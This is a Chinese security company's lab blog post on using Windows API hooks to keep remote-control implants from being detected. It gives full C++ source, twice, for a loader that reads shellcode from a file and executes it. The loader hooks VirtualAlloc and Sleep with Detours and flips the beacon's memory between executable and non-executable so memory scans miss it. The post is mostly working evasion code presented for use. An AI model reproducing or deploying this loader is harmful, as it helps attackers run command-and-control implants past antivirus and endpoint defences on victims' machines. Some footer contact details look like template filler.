创安实验室专栏丨windows基于hook的远控免杀 - 成都创信华通信息技术有限公司

新闻动态

创安实验室专栏丨windows基于hook的远控免杀

2022-11-04 00:00:00

古语有云：“学如逆水行舟，不进则退。”面对如今随时都在变化的网络安全环境更是如此。为此，创信华通微信公众号特开设“创安实验室专栏”，以记录创信华通创安实验室在技术上的探索，加强同行间的交流，相互学习，共同进步。

✦+

windows基于hook的远控免杀

HOOK的概念

钩子(Hook)，是Windows消息处理机制的一个平台，应用程序可以在上面设置子程以监视指定窗口的某种消息，而且所监视的窗口可以是其他进程所创建的。当消息到达后，在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。其实就是改变程序执行流程的一种技术的统称。

免杀实现

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//创建一个命名的或无名的事件对象

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注册向量异常处理程序，并返回异常处理程序的句柄

Hook(); //开始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//创建线程，指向线程函数的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//关闭线程

unsigned char* BinData = NULL;

size_t size = 0;

char* szFilePath = ".\\test.bin";

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申请内存空间，返回首地址

memcpy(shellcode_addr, BinData, size);//从存储区 BinData复制 size个字节到存储区 shellcode_addr

VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为可执行模式

(*(int(*)()) shellcode_addr)(); //执行shellcode

UnHook();//结束hook

return 0;

}

主要函数

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)：用于设置shellcode区域的不可执行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)：用于恢复shellcode区域的可执行模式

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)：用于读取二进制文件

void Hook()：HOOK

void UnHook()：接触HOOK

void WINAPI NewSleep(DWORD dwMilliseconds)：显示cs的sleep时间

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)：用于分配内存地址和大小

设置Beacon_address所在内存区域设置为可执行模式

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

printf("恢复Beacon内存属性\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//设置Beacon_address所在内存区域设置为可执行模式

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

将shellcode_addr所在内存区域设置为不可执行模式

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes启动\n");

while (true)

{

WaitForSingleObject(hEvent, INFINITE);//检测hEvent事件的信号状态,INFINITE表示函数将仅在对象收到信号时返回

printf("设置Beacon内存属性不可执行\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为不可执行模式

ResetEvent(hEvent); //设置事件hEvent为无信号状态

}

return 0;

}

静态免杀效果

动态免杀效果

完整代码

#include "pch.h"

#include

#include "detours.h"

#include "detver.h"

#pragma comment(lib,"detours.lib")

LPVOID Beacon_address;

SIZE_T Beacon_data_len;

DWORD Beacon_Memory_address_flOldProtect;

HANDLE hEvent;

BOOL Vir_FLAG = TRUE;

LPVOID shellcode_addr;

static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;

//分配内存地址和大小

LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {

Beacon_data_len = dwSize;

Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);

printf("分配大小:%d", Beacon_data_len);

printf("分配地址:%llx \n", Beacon_address);

return Beacon_address;

}

static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;

//设置新的sleep地址

void WINAPI NewSleep(DWORD dwMilliseconds)

{

if (Vir_FLAG)

{

VirtualFree(shellcode_addr, 0, MEM_RELEASE);

Vir_FLAG = false;

}

printf("sleep时间:%d\n", dwMilliseconds);

SetEvent(hEvent);

OldSleep(dwMilliseconds);

}

void Hook()

{

DetourRestoreAfterWith(); //避免重复HOOK

DetourTransactionBegin(); // 开始HOOK

DetourUpdateThread(GetCurrentThread());//列入一个在DetourTransaction过程中要进行update的线程，为了避免崩溃

DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc); //多次调用DetourAttach，HOOK多个函数

DetourAttach((PVOID*)&OldSleep, NewSleep);

DetourTransactionCommit(); // 提交HOOK

}

void UnHook()

{

DetourTransactionBegin();//解除截获过程

DetourUpdateThread(GetCurrentThread());//列入一个在DetourTransaction过程中要进行update的线程，为了避免崩溃

DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);//撤销对NewVirtualAlloc的hook

DetourTransactionCommit();//解除hook

}

size_t GetSize(char* szFilePath)

{

size_t size;

FILE* f = fopen(szFilePath, "rb");

fseek(f, 0, SEEK_END);

size = ftell(f);//ftell配合fseek计算出文件大小

rewind(f);

fclose(f);

return size;

}

unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)

{

unsigned char* p = NULL;

FILE* f = NULL;

size_t res = 0;

*size = GetSize(szFilePath);

if (*size == 0) return NULL;

f = fopen(szFilePath, "rb");

if (f == NULL)

{

printf("Binary file does not exists!\n");

return 0;

}

p = new unsigned char[*size];

// Read file

rewind(f);

res = fread(p, sizeof(unsigned char), *size, f);

fclose(f);

if (res == 0)

{

delete[] p;

return NULL;

}

return p;

}

BOOL is_Exception(DWORD64 Exception_addr)

{

if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address)

{

printf("地址符合:%llx\n", Exception_addr);

return true;

}

printf("地址不符合:%llx\n", Exception_addr);

return false;

}

LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)

{

printf("FirstVectExcepHandler\n");

printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);

//printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)

{

printf("恢复Beacon内存属性\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//设置Beacon_address所在内存区域设置为可执行模式

return EXCEPTION_CONTINUE_EXECUTION;

}

return EXCEPTION_CONTINUE_SEARCH;

}

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)

{

printf("Beacon_set_Memory_attributes启动\n");

while (true)

{

WaitForSingleObject(hEvent, INFINITE);//检测hEvent事件的信号状态,INFINITE表示函数将仅在对象收到信号时返回

printf("设置Beacon内存属性不可执行\n");

VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为不可执行模式

ResetEvent(hEvent); //设置事件hEvent为无信号状态

}

return 0;

}

int main()

{

hEvent = CreateEvent(NULL, TRUE, false, NULL);//创建一个命名的或无名的事件对象

AddVectoredExceptionHandler(1, &FirstVectExcepHandler);//注册向量异常处理程序，并返回异常处理程序的句柄

Hook(); //开始hook

HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);//创建线程，指向线程函数的地址Beacon_set_Memory_attributes

CloseHandle(hThread1);//关闭线程

unsigned char* BinData = NULL;

size_t size = 0;

char* szFilePath = ".\\test.bin";

BinData = ReadBinaryFile(szFilePath, &size);

shellcode_addr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);//申请内存空间，返回首地址

memcpy(shellcode_addr, BinData, size);//从存储区 BinData复制 size个字节到存储区 shellcode_addr

VirtualProtect(shellcode_addr, size, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);//将shellcode_addr所在内存区域设置为可执行模式

(*(int(*)()) shellcode_addr)(); //执行shellcode

UnHook();//结束hook

return 0;

}

E·N·D

本文由创信华通创安攻防实验室编辑。

如有侵权，请联系后台。

●

创安攻防实验室

创安攻防实验室，是成都创信华通信息技术有限公司旗下的技术研究团队，成立于2021年9月，主要研究红蓝对抗、重大安全保障、应急响应等方向。

创安攻防实验室圆满完成了多次公安举办的重要网络安全保障和攻防演习活动，并积极参加各类网络安全竞赛，屡获殊荣。

创安攻防实验室秉承创信华通的发展理念，致力打造国内一流网络安全团队。

创安实验室专栏丨TerraMaster TOS 信息泄漏到命令执行

Nmap部分常规使用

政策解读丨《人脸识别技术应用安全管理办法》

一图读懂：《网络安全等级保护测评报告》2025版新变化

全国数标委2025年第一次“标准周”活动在成都举行：今年拟制修订41项数据领域国家标准

安全通告丨网络安全漏洞通告（2025年3月）

创信华通作为组长单位参编的《商用密码应用安全性评估测评实施指引》等2项密评指导性文件发布

一图读懂《个人信息保护合规审计管理办法》

电话：028-01000000

传真：028-01001010

邮箱：support@baidu.com

地址：北京市高新区天府大道200号

电话：400-6446-808 028-85328724 19960399374

邮编：610041

地址：成都市武侯区天府二街蜀都中心一期 2号楼3003